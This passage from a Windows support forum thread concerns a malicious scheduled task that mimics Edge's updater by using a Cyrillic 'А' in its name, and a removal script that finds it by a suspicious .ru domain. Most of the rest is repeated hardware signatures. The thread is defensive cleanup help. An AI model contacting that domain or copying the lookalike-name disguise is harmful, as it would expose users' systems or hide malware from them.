The RIGHT one. There's one with an English A, and one with a Cyrillic A.
You may have to click on the task's properties to expand the actual details.

OK yeah right, I forgot there is a legit MicrosoftEdgeUpdateTaskMachineUА
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
The script from post 51 Found it, how do I get rid of it?

The script just above (#55) should find and kill the correct one using references like yrewdvnkl .ru

It will ask you before deleting.
 

My Computers

System One System Two

  • OS
    Windows 11 Pro 23H2 Build 22631.5624
    Computer type
    PC/Desktop
    Manufacturer/Model
    Sin-built
    CPU
    Intel(R) Core(TM) i7-4770K CPU @ 3.50GHz (4th Gen?)
    Motherboard
    ASUS ROG Maximus VI Formula
    Memory
    32.0 GB of I forget and the box is in storage.
    Graphics Card(s)
    Gigabyte nVidia GeForce GTX 1660 Super OC 6GB
    Sound Card
    Onboard
    Monitor(s) Displays
    5 x LG 25MS500-B - 1 x 24MK430H-B - 1 x Wacom Pro 22" Tablet
    Screen Resolution
    All over the place
    Hard Drives
    Too many to list.
    OS on Samsung 1TB 870 QVO SATA
    PSU
    Silverstone 1500
    Case
    NZXT Phantom 820 Full-Tower Case
    Cooling
    Noctua NH-D15 Elite Class Dual Tower CPU Cooler / 6 x EziDIY 120mm / 2 x Corsair 140mm somethings / 1 x 140mm Thermaltake something / 2 x 200mm Corsair.
    Keyboard
    Corsair K95 / Logitech diNovo Edge Wireless
    Mouse
    Logitech: G402 / G502 / Mx Masters / MX Air Cordless
    Internet Speed
    1000/400Mbps
    Browser
    All sorts
    Antivirus
    Kaspersky Premium
    Other Info
    I’m on a horse.
  • Operating System
    Windows 11 Pro 23H2 Build: 22631.4249
    Computer type
    Laptop
    Manufacturer/Model
    LENOVO Yoga 7i EVO OLED 14" Touchscreen i5 12 Core 16GB/512GB
    CPU
    Intel Core 12th Gen i5-1240P Processor (1.7 - 4.4GHz)
    Memory
    16GB LPDDR5 RAM
    Graphics card(s)
    Intel Iris Xe Graphics Processor
    Sound Card
    Optimized with Dolby Atmos®
    Screen Resolution
    QHD 2880 x 1800 OLED
    Hard Drives
    M.2 512GB
    Antivirus
    Defender / Malwarebytes
    Other Info
    …still on a horse.
No matching scheduled tasks found.
 

Attachments

My Computer

System One

  • OS
    Windows 11 Pro Insider 64 bit 25H2 26200.5670
    Computer type
    PC/Desktop
    Manufacturer/Model
    Gigabyte Z390 UD
    CPU
    Intel Core i7 9700K 3.60
    Motherboard
    Gigabyte Z390 UD
    Memory
    16 GB
    Graphics Card(s)
    nVidia GEForce RTX 2060 Super
    Sound Card
    onboard
    Monitor(s) Displays
    Two 27" Dell 4K monitors
    Screen Resolution
    3840 x 2160
    Hard Drives
    M.2 NVME SSD, 500 GB; Two 2TB Mechanical HDD's
    PSU
    850w PSU
    Case
    Cyberpower PC
    Cooling
    Water cooled
    Keyboard
    Backlit Cyberpower gamiong keyboard
    Mouse
    Backlit Cyberpower gaming mouse
    Internet Speed
    1 GB mbps
    Browser
    Brave
    Antivirus
    Windows Security

Latest Support Threads

Back
Top Bottom